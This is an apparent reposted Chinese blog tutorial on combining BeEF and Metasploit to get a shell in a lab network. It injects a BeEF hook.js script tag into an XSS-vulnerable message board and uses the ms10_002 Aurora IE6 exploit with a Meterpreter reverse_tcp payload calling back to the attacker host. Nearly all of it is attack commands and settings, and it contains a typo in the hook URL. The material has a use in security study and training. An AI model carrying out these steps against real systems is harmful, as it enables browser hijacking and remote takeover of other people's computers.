beef +metasploit关联拿shell教程

参考了网络很多大神文章,简单小结一下,仅供参考
1,配置beef的vim /usr/share/beef-xss/config.yaml,修改此文件metasploit配置为 enable:true 
2,配置vim /usr/share/beef-xss/extensions/metasploit/config.yaml,修改此文件配置两处ip为kali自身ip
3,首次启动msf,先启动postgresql数据库服务service postgresql restart,再启动msfconsole
4,msf终端内输入命令 load msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123   //ServerHost为kali ip,User&Pass为2步骤配置的账号密码
5,修改beef默认账号密码, vim /etc/beef-xss/config.yaml  //修改 User:beef,Password:beef
6,启动beef, beef-xss
1.Kali:IP:192.168.126.140
2.web服务器IP:192.168.126.205 存在XSS跨站脚本漏洞
3.客户端IP:192.168.126.130 
4.Kali使用beef生成恶意代码网络
5.浏览器输入 http://127.0.0.1:3000/ui/panel,登陆beef,Usename与Password均为beef
6.将Hook URL “<scriptsrc="http://1192.168.126.140:3000/hook.js"></script>”写入存在XSS漏洞的web服务器文本框
7.只要客户端访问服务器192.168.126.205留言板,客户端浏览器就会被劫持框
service postgresql start  //启动msf数据库
msfconsole  //启动msf
8.search ms10_002      //搜索ms10_002漏洞
9.useexploit/windows/browser/ms10_002_aurora  //使用ms10_002极光漏洞
10.set payloadwindows/meterpreter/reverse_tcp  //设置TCP回连攻击载荷
11.show options        //查看漏洞利用选项
12.set srvhost 192.168.126.140  //配置客户端访问的目标地址,这里是Kali本机的IP地址
13.set srvport 7777  //访问的端口号
14.set uripath      //网站根路径
15.set lhost 192.168.126.140  //设置本地接收监听地址
16.set lport 4444  //端口号
17.show options   //查看配置选项是否ok
18.exploit  //执行利用
19.利用Beef生成的恶意代码植入到存在XSS漏洞的web服务器(192.168.126.205),客户端(192.168.126.130)浏览植入恶意代码的网页,形成客户端浏览器被劫持。
当前客户端使用的环境为windows XP+IE6,咱们使用metasploit framework工具针对IE6的ms10_002极光漏洞进行利用,控制客户端被劫持的
浏览器访问192.168.126.140:7777,触发该漏洞,经过漏洞拿到客户端的权限shell,回连192.168.126.140:4444,从而达到控制客户端系统的目的
  

猜你喜欢

转载自blog.csdn.net/weixin_44212888/article/details/114243490
今日推荐